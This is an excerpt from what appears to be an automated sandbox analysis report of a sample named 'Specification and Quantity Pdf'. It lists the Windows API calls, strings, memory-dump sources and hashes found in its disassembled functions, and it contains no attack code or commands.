ResumeThread.KERNEL32 ref: 00007FF773C5B7F2

Strings

kernel32, xrefs: 00007FF773C5B724
QueueUserAPC2, xrefs: 00007FF773C5B73A

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: Thread$AddressContextErrorLastLibraryLoadProcResumeSuspend
String ID: QueueUserAPC2$kernel32
API String ID: 3714266957-4022151419
Opcode ID: bc70cecf5c74af7520f56920f6343e2be3003b4f5f30e659a0aacf61ab6d3dce
Instruction ID: caaf3d86a6355c8503bfca3ec10eedcff768fe70c921cf2f5b495dacc0928688
Opcode Fuzzy Hash: bc70cecf5c74af7520f56920f6343e2be3003b4f5f30e659a0aacf61ab6d3dce
Instruction Fuzzy Hash: 6E318862B3CA4281EAD0AB55E840379A391EF45BE4FE41231D96D667D4DF2CE4458720

Function 00007FF773C7BC40 Relevance: 9.2, APIs: 6, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe6e69181591d6301f79addf1851dae84baba91a0e20fc1957c0ed45eea2809c
Instruction ID: 9f8c9d9a9a9b58664008e9a61813bb5625f5da37ddde72b4170ba1bc42b250c6
Opcode Fuzzy Hash: fe6e69181591d6301f79addf1851dae84baba91a0e20fc1957c0ed45eea2809c
Instruction Fuzzy Hash: 7571A323A3D64281FAD4BB6195402B9F3A1AF60B94F980036DE5D277D9DF3CE4508360

Function 00007FF773C90FE0 Relevance: 9.2, APIs: 6, Instructions: 151COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32 ref: 00007FF773C91090
DebugBreak.KERNEL32 ref: 00007FF773C910CD
DebugBreak.KERNEL32 ref: 00007FF773C910E8
DebugBreak.KERNEL32 ref: 00007FF773C9111D
DebugBreak.KERNEL32 ref: 00007FF773C91138
DebugBreak.KERNEL32 ref: 00007FF773C911A9

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: 5d73b6675c1853df630bb6c88506b6e80ad5f9561737fbd2e3aae4c93d19f0ff
Instruction ID: 6ed45743f4d85db753fea47c6468181fc15973a77ee74ef547de66ad0df2264d
Opcode Fuzzy Hash: 5d73b6675c1853df630bb6c88506b6e80ad5f9561737fbd2e3aae4c93d19f0ff
Instruction Fuzzy Hash: 0A51B423B39A4699EB94BB51C0412BCB3A1FB44B94F975136CA1D233D1EE3DE581C361

Function 00007FF773C72770 Relevance: 9.1, APIs: 6, Instructions: 132threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF773C727B7
LeaveCriticalSection.KERNEL32 ref: 00007FF773C727CF
SwitchToThread.KERNEL32 ref: 00007FF773C7288C
SwitchToThread.KERNEL32 ref: 00007FF773C72895
SwitchToThread.KERNEL32 ref: 00007FF773C728BF
LeaveCriticalSection.KERNEL32 ref: 00007FF773C72963

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: CriticalSectionSwitchThread$Leave$Enter
String ID:
API String ID: 1765607624-0
Opcode ID: faad790ec28286bda2ef36a915e46beff94c7fcad6aaa131053e1d9cfa2025f0
Instruction ID: 8903eee25086a6037786de31b7048752ea8f164bd83d28f07373a5629a6652a4
Opcode Fuzzy Hash: faad790ec28286bda2ef36a915e46beff94c7fcad6aaa131053e1d9cfa2025f0
Instruction Fuzzy Hash: 27519F33E3C10B86F6D4BBA4A841579F690EF00711FD84236E86DB62E2DF2DB8549670

Function 00007FF773C91DE0 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF773C91FB1,?,?,00000269844A0250,00007FF773C914E2), ref: 00007FF773C91E89
DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF773C91FB1,?,?,00000269844A0250,00007FF773C914E2), ref: 00007FF773C91EA1
DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF773C91FB1,?,?,00000269844A0250,00007FF773C914E2), ref: 00007FF773C91EB9
DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF773C91FB1,?,?,00000269844A0250,00007FF773C914E2), ref: 00007FF773C91ED7
DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF773C91FB1,?,?,00000269844A0250,00007FF773C914E2), ref: 00007FF773C91EFC
DebugBreak.KERNEL32 ref: 00007FF773C91F30

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: eb5a1da3c55d9acfe23894c72031d4decde521b88f1bcb182cc320728f4e60f2
Instruction ID: ab55a1503ee2787f7d2f35d451d3a1bb733b64789a43bd356d243500194ba856
Opcode Fuzzy Hash: eb5a1da3c55d9acfe23894c72031d4decde521b88f1bcb182cc320728f4e60f2
Instruction Fuzzy Hash: EE41B223A3C69689F7D1BB61900127EF791EF44B94F990035EE4D266D6DE3CE881C3A1

Function 00007FF773C55260 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF773C5B6A0: GetCurrentThreadId.KERNEL32 ref: 00007FF773C5B6A4

GetCurrentProcess.KERNEL32 ref: 00007FF773C552A6
GetCurrentThread.KERNEL32 ref: 00007FF773C552AE
DuplicateHandle.KERNEL32 ref: 00007FF773C552D2

Part of subcall function 00007FF773C5CA20: VirtualQuery.KERNEL32 ref: 00007FF773C5CA52

RaiseFailFastException.KERNEL32 ref: 00007FF773C55300

Strings

, xrefs: 00007FF773C55314

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
String ID:
API String ID: 510365852-3916222277
Opcode ID: 9ced71184ac91c8616e97de7930c93111042d63eeb25a1540481694c845d8b19
Instruction ID: e39af4df13b03e369982299709eb894161c9cdf665a55fa9ab513fb129bbcee8
Opcode Fuzzy Hash: 9ced71184ac91c8616e97de7930c93111042d63eeb25a1540481694c845d8b19
Instruction Fuzzy Hash: F0118E73628B818AD7A0EF25B4401AAB760FB457B4F584335E6BE1BAD6CF78D0428700

Function 00007FF773C86730 Relevance: 7.6, APIs: 6, Instructions: 135COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF773C867DE
LeaveCriticalSection.KERNEL32 ref: 00007FF773C86824
EnterCriticalSection.KERNEL32 ref: 00007FF773C868F6
LeaveCriticalSection.KERNEL32 ref: 00007FF773C86917
EnterCriticalSection.KERNEL32 ref: 00007FF773C8695F
LeaveCriticalSection.KERNEL32 ref: 00007FF773C86980

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 30c2a865ca8bebd16377ec9e55b12350cbbdee7e357ec5e7fec82702041c0912
Instruction ID: ca0a9a85667fffdec80be5efe1368ec1786e6c702750d6f1ad3d04286c02c914
Opcode Fuzzy Hash: 30c2a865ca8bebd16377ec9e55b12350cbbdee7e357ec5e7fec82702041c0912
Instruction Fuzzy Hash: 67610F2393CB4685EAD0AB95E8803B5F394AF44790FD40536D98D63795DF3CE16583A0

Function 00007FF773C81A50 Relevance: 7.6, APIs: 6, Instructions: 114COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF773C81AEA
LeaveCriticalSection.KERNEL32 ref: 00007FF773C81B2F

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 7f292bd782e5db76287a58f2738b6682abde35b80ac547e9518716b401c7d407
Instruction ID: ec2f83ac161d64541a0050ccd079c44115dad6b5ec52ab4a1ebb76ab50ee4325
Opcode Fuzzy Hash: 7f292bd782e5db76287a58f2738b6682abde35b80ac547e9518716b401c7d407
Instruction Fuzzy Hash: 2451FB3693CB8681EAE0AB54E8813B5F3A4EF84794FD40136C98D63695DF3CE16587A0

Function 00007FF773C53540 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

RaiseFailFastException.KERNEL32 ref: 00007FF773C535E0
RaiseFailFastException.KERNEL32 ref: 00007FF773C536E9
RaiseFailFastException.KERNEL32 ref: 00007FF773C53726

Strings

Process is terminating due to StackOverflowException., xrefs: 00007FF773C535CA

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: ExceptionFailFastRaise
String ID: Process is terminating due to StackOverflowException.
API String ID: 2546344036-2200901744
Opcode ID: 8c7f27cb811299753a952a27045d38bbe572bc9dae65ba32a05ed8a71e85e72f
Instruction ID: 58ecec5b821ab83334801fcbe04e9667070cbef85b30fe101e782dad521bc630
Opcode Fuzzy Hash: 8c7f27cb811299753a952a27045d38bbe572bc9dae65ba32a05ed8a71e85e72f
Instruction Fuzzy Hash: 2151B167F3964281EED0AB15D4503B8A391FB48B84FE84137EA5E677E0DF2DE4558320

Function 00007FF773C90570 Relevance: 6.1, APIs: 4, Instructions: 126threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32(?,?,?,00007FF773C6AF49), ref: 00007FF773C905EB
SwitchToThread.KERNEL32(?,?,?,00007FF773C6AF49), ref: 00007FF773C90692
SwitchToThread.KERNEL32(?,?,?,00007FF773C6AF49), ref: 00007FF773C906A8

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: 43a0589b976ba65fc858849c45dd8cb8d0f1c6ed62617d059feff9e61ea92c26
Instruction ID: ddf9d14a1b6db39859b18bae229e151cb2a903f1738658667ee833b58bcc91bd
Opcode Fuzzy Hash: 43a0589b976ba65fc858849c45dd8cb8d0f1c6ed62617d059feff9e61ea92c26
Instruction Fuzzy Hash: 8541B573B3966686FBE06E25D04063DB290EB40B94F95913ADB0E567C9EF3CE440C726

Function 00007FF773C90E70 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32(?,00000000,?,00007FF773C6E7B5,?,?,0000000100000001,00007FF773C7CA48), ref: 00007FF773C90F49
DebugBreak.KERNEL32(?,00000000,?,00007FF773C6E7B5,?,?,0000000100000001,00007FF773C7CA48), ref: 00007FF773C90F66
DebugBreak.KERNEL32(?,00000000,?,00007FF773C6E7B5,?,?,0000000100000001,00007FF773C7CA48), ref: 00007FF773C90F81
DebugBreak.KERNEL32(?,00000000,?,00007FF773C6E7B5,?,?,0000000100000001,00007FF773C7CA48), ref: 00007FF773C90F9A

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: 1c7403b06a8287785738a1b79607cbfa0b74b256696118e6c96bd0e0f9b3bca9
Instruction ID: b083748a55d08f2d26c194cfd8ecb8ae9d67a54aa5f605bc42eec7e982c88213
Opcode Fuzzy Hash: 1c7403b06a8287785738a1b79607cbfa0b74b256696118e6c96bd0e0f9b3bca9
Instruction Fuzzy Hash: 6C41B423A3D6A685FAD16B509500379F6E0EF44B58F9A0435DE8C272C5EE7CE482C362

Function 00007FF773C7F280 Relevance: 6.1, APIs: 4, Instructions: 85COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32(?,?,00000000,?,00007FF773C7B16E,?,?,-8000000000000000,00007FF773C8E9AE,?,?,?,00007FF773C688C3), ref: 00007FF773C7F339
DebugBreak.KERNEL32(?,?,00000000,?,00007FF773C7B16E,?,?,-8000000000000000,00007FF773C8E9AE,?,?,?,00007FF773C688C3), ref: 00007FF773C7F356
DebugBreak.KERNEL32(?,?,00000000,?,00007FF773C7B16E,?,?,-8000000000000000,00007FF773C8E9AE,?,?,?,00007FF773C688C3), ref: 00007FF773C7F376
DebugBreak.KERNEL32(?,?,00000000,?,00007FF773C7B16E,?,?,-8000000000000000,00007FF773C8E9AE,?,?,?,00007FF773C688C3), ref: 00007FF773C7F399

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: BreakDebug
String ID:
API String ID: 456121617-0
Opcode ID: fadf0de926549372bb38a711b3a869a02a71d20e7acaacbe5fadbf81d570d035
Instruction ID: e407ec399ba669a42727bafb5b4eafcc69eb7f63cfde6182331d081f0bd90821
Opcode Fuzzy Hash: fadf0de926549372bb38a711b3a869a02a71d20e7acaacbe5fadbf81d570d035
Instruction Fuzzy Hash: F9318F6363AB4682EBA4BB65A080279F7A8FF44B95F980035DE4D676D5CF3CE441C360

Function 00007FF773C5B520 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF773C553F1), ref: 00007FF773C5B554
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF773C553F1), ref: 00007FF773C5B55E
CoWaitForMultipleHandles.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF773C553F1), ref: 00007FF773C5B57D
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF773C553F1), ref: 00007FF773C5B591

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: ErrorLastMultipleWait$HandlesObjects
String ID:
API String ID: 2817213684-0
Opcode ID: fb3803eab1f8f5efa5fb27e8f20969c784412db916d2e9a85c31db86b57d2910
Instruction ID: 8c4cb1541dc72e1369228b76f650362c70f6a3f58e9ce8966d14520627c267be
Opcode Fuzzy Hash: fb3803eab1f8f5efa5fb27e8f20969c784412db916d2e9a85c31db86b57d2910
Instruction Fuzzy Hash: BD114F32B3CA55C2D7586B69A40013AE661FB84795FA40136EADD53A99CF3CD4148B50

Function 00007FF773CBC658 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF773CBB963), ref: 00007FF773CBC6A8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF773CBB963), ref: 00007FF773CBC6E9

Strings

csm, xrefs: 00007FF773CBC6D6

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 29c9d3c2ced156e708d0624c64ac5506fb70f8574287197aa5be238856b2bc0e
Instruction ID: 6cf663165876e9a3e3c8731fc956d3347fe14fa035b5c46c7e34acccde17ed61
Opcode Fuzzy Hash: 29c9d3c2ced156e708d0624c64ac5506fb70f8574287197aa5be238856b2bc0e
Instruction Fuzzy Hash: 48112E33629B8182EB619F15F440269B7E4FB88B88F588231DECD17764DF3CD5518B00

Function 00007FF773C5D050 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37stringCOMMON

Download Yara Rule

APIs

